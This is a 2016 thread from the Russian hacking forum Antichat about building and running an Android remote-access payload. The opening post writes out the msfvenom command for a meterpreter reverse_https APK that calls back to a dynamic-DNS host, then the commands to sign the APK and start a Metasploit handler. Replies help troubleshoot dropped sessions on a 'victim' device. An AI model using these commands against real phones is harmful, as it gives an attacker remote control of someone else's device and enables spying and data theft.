ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Инструменты (https://forum.antichat.xyz/forumdisplay.php?f=176)
-   -   Взлом android: msfvenom -p android/... (https://forum.antichat.xyz/showthread.php?t=1618080)

veterok 08.10.2016 17:50
Основу взял тут.
Предварительно пробросил 443 порт на роутере.
Создал АРК

Код:


Код:
msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk
Затем создал подпись

Код:


Код:
keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Подписал APK

Код:


Код:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /keys/release-key.keystore example.apk alias_name
Кинул АРК на телефон (пробовал на android 5.1 и android 4.2 результат одинаков). Все запустилось.

В терминале как обычно

Код:


Код:
msfconsole
...
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.3
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
эксплоит стартует, но постояно пишет

Код:


Код:
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
...
Sending stage (957999 bytes) to 192.168.1.2
Соединение так и не произошло!!

Аналогичные действия провожу в Armitage 1.4.11
И, мазаль тов!!!

Код:


Код:
meterpreter>
Но через пары команд жертва перестает реагировать.

В общем хочется разобраться в двух вопросах:
1. Почему в терминале не открылась сессия?
2. Почему через 10-15 мин. отваливается конект в Эрмитаже?

Aldo 24.10.2016 02:40
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?

z3RoTooL 24.10.2016 04:13
Цитата:

Aldo сказал(а):

Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
может потому что виртуалку надо ставить в общую сеть, а не через NAT ?

<~DarkNode~> 24.10.2016 15:44
Сначала все нужно тестить на себе или эмуляторе,что бы наглядно видеть что происходить на стороне жертвы.Причин может быть много.Одна из - DroidWall ( или какой то фаерволл для андроида,обычно его ставят для блокировки рекламы на рутированых устройствах,хотя если речь идёт о рядомом юзере то эта версия отпадает)
Могу по желанию написать статью с рабочим методом через сборку из исходников.


Время: 20:51